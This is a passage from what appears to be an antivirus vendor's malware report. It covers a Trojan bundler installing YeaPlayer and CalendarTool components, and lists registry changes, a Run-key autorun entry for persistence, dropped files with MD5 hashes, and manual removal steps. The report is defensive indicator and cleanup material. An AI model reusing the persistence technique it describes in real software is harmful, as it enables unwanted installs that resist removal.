[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "34 F0 57 68 43 87 DA 97 3C 50 9C 21 7B C7 3B 8D"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

[HKU\.DEFAULT\Software\Baidu\BHipsDR]
"LastTime" = "DD 07 02 00 04 00 0E 00 00 00 37 00 2F 00 4E 00"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\CalendarServ\DEBUG]
"Trace Level"

The process CalendarServ.exe:3156 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "88 14 96 58 67 41 95 FE A7 81 FB 51 2E 1E 13 10"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process yeaplayer_br_ibd_bundle.exe:2328 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
"CategoryCount" = "16"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "82 45 65 90 9A E8 C2 71 59 26 A1 F2 1D 50 4D F2"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\yeaplayer_br_ibd_bundle\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\yeaplayer_br_ibd_bundle\DEBUG]
"Trace Level"

The process %original file name%.exe:1216 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3F 8C 0D 80 C2 D3 53 35 30 EA 5C ED D1 F0 F7 60"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\setup.exe,"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The process rundll32.exe:1976 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9F 3E 9C E2 0A 29 4F 57 B5 73 9E 76 B4 F6 BB DF"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"LangID" = "09 04"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@shdoclc.dll,-880" = "Internet Explorer"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"SHELL32.dll,-9319"

The process setup.exe:1948 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 D7 F5 33 3D DF 65 5C AB A2 6D 5A AF 6D C0 7B"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"YeaInstaller" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\setup.exe"

The process setup.exe:348 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 D2 CB 94 B8 DC 70 D4 E9 9C 81 6D C4 B7 FD 52"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKCU\Software\YeaInstaller]
"TmN" = "51486"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The process Calendar.exe:3428 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8B 0F BF 8E E9 62 87 0D FD B2 6B B4 CC 3F 9B CD"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process 291734.exe:2712 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "43 E9 B4 94 AC 7E 2F E5 91 4F E3 E6 87 51 84 4D"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\DtsEncodeTools]
"{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}" = "{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

Dropped PE files

MD5	File path
41079c5f52bdaae924b668f58848f7ea	c:\Documents and Settings\"%CurrentUserName%"\Application Data\YeaPlayer_br_IBD_Bundle.exe
41079c5f52bdaae924b668f58848f7ea	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\11082\YeaPlayer_br_IBD_Bundle.exe
9202f096accb0e5dabc4de57365a1bf4	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd2.tmp\setup.exe
d847ccf62c349453393ec8042ffddd95	c:\Program Files\CalendarTool\2.0.0.11189\CalendarEntry.dll
63bbff06febbdf113c94c426396430c8	c:\Program Files\CalendarTool\2.0.0.11189\CalendarServ.exe
598c72aba0b2afc46f1b85b8ffa003e3	c:\Program Files\CalendarTool\2.0.0.11189\CrashReport.exe
4a42c7920e2c2978d862544832b967ab	c:\Program Files\CalendarTool\2.0.0.11189\CrashUL.exe
a5a91a90602dc58562c8c311e1e8b019	c:\Program Files\CalendarTool\2.0.0.11189\EVPDR.dll
326fa0636ae763210d7d6e2cc5619be8	c:\Program Files\CalendarTool\2.0.0.11189\EVPHelp.dll
2064fea63e5501e2cde3af77de07e1ab	c:\Program Files\CalendarTool\2.0.0.11189\EVPKernel.dll
6aa6f72365d13397f8d9e6cb5e8707fd	c:\Program Files\CalendarTool\2.0.0.11189\EVPNet.dll
73e5bd50fd3af7a7a24a73bf279282f0	c:\Program Files\CalendarTool\2.0.0.11189\EVPTask.dll
4cfc9da8e06cdf64e411759b6eb82ab8	c:\Program Files\CalendarTool\2.0.0.11189\InstallHelper.exe
b8f50f062002e67901b134ae536907e9	c:\Program Files\CalendarTool\2.0.0.11189\Report.exe
c56db1a95947290eedea6fb6b7b5267a	c:\Program Files\CalendarTool\2.0.0.11189\calendar.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):
imapi.exe:1932
InstallHelper.exe:3084
InstallHelper.exe:3480
nst6.tmp.exe:2736
nst6.tmp.exe:2804
CalendarServ.exe:3180
CalendarServ.exe:3156
yeaplayer_br_ibd_bundle.exe:2328
%original file name%.exe:1216
rundll32.exe:1976
setup.exe:1948
setup.exe:348
291734.exe:2712
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:
%WinDir%\Temp\g5z08pj0.TMP (146970 bytes)
%Documents and Settings%\%current user%\Application Data\CalendarTool\dump\BugReportConfig.ini (940 bytes)
%Documents and Settings%\All Users\Documents\Tools\Common\I18N\conf.db (759 bytes)
%Documents and Settings%\LocalService\Application Data\CalendarTool\dump\BugReportConfig.ini (940 bytes)
%Documents and Settings%\All Users\Documents\Baidu\Common\I18N\conf.db (759 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\61807c4bafc26bb2ed98e3e60f587cd6\291734.exe.info (24 bytes)
C:\MINI.LOG (5089 bytes)
%Documents and Settings%\All Users\Documents\Guid\Common\I18N\conf.db (759 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\INetC.dll (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P5SDE3AF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KDYJ45YV\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\setup.exe (50903 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6KWD5RP0\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\ns3.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QY4FSATI\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\11082\YeaPlayer_br_IBD_Bundle.exe (141913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\11075\51486_a.xml (8672 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\cookies (188 bytes)
%Documents and Settings%\%current user%\Application Data\YeaPlayer_br_IBD_Bundle.exe (4185 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_today_pressed.png (172 bytes)
%Program Files%\CalendarTool\2.0.0.11189\DefaultConfig\Festival.json (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config7\Language.json (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_heart_color.png (440 bytes)
%Program Files%\CalendarTool\2.0.0.11189\CalendarEntry.dll (4316 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_pen_grey.png (248 bytes)
%Program Files%\CalendarTool\2.0.0.11189\CrashUL.exe (8165 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config7\Festival.json (1568 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_today_hover.png (174 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_scroll_pressed.png (189 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config8\Config.json (2 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_left_normal.png (995 bytes)
%Program Files%\CalendarTool\2.0.0.11189\InstallHelper.exe (19114 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_pen_half.png (217 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchup_normal.png (481 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\img_arrow_up.png (132 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_mode_normal.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config-3\Festival.json (16 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_scroll_hover.png (179 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Report.exe (5902 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_checkbox_unselect.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_radio_selected.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\main_bg_frame.png (1260 bytes)
%Program Files%\CalendarTool\2.0.0.11189\calendar.exe (47962 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_left_pressed.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_classsic.png (3 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchup_pressed.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_mode_pressed.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_money_half.png (443 bytes)
%Program Files%\CalendarTool\2.0.0.11189\CrashReport.exe (16453 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_scroll_normal.png (179 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_radio_hover.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config9\Festival.json (12 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPKernel.dll (23698 bytes)
%Program Files%\CalendarTool\2.0.0.11189\DefaultConfig\Language.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\System.dll (11 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_today_normal.png (177 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config-3\Language.json (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\CalendarServ.exe (2318 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_right_normal.png (994 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchdown_hover.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_scroll_disabled.png (179 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_right_hover.png (993 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config8\Language.json (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_checkbox_selected.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_aero1.png (3 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_checkbox_hover.png (949 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_aero.png (3 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_clover_grey.png (452 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_right_pressed.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\img_arrow_down.png (131 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config8\Festival.json (15 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchdown_normal.png (519 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_left_hover.png (995 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config7\Festival_special.json (6 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_modern.png (2 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_pen_color.png (235 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_money_color.png (606 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPConfig.ini (234 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_mode_hover.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_menu.png (989 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchup_hover.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_clover_half.png (348 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_clover_color.png (509 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_heart_grey.png (417 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPNet.dll (11930 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config9\Config.json (2 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config9\Language.json (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPHelp.dll (10720 bytes)
%Program Files%\CalendarTool\2.0.0.11189\CrashReportModuleConf.ini (673 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_checkbox_normal.png (955 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPDR.dll (10408 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\skin.xml (1568 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config7\Config.json (2 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config-3\Config.json (3 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_radio_normal.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\scroll.bmp (1568 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchdown_pressed.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst6.tmp.exe (19114 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_heart_half.png (307 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\main_bg_bottom.png (8 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_main.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPTask.dll (13763 bytes)
%Program Files%\CalendarTool\2.0.0.11189\DefaultConfig\Config.json (2 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_money_grey.png (576 bytes)
Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"YeaInstaller" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\setup.exe"
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	24124	24576	4.45853	1a13b408c917b27c9106545148d3b8d3
.rdata	28672	4714	5120	3.46982	921acf8cb0aea87c0603fa899765fcc2
.data	36864	154936	1536	2.97482	797517c6ef57aa95d53df2cf07568953
.ndata	192512	32768	0	0	d41d8cd98f00b204e9800998ecf8427e
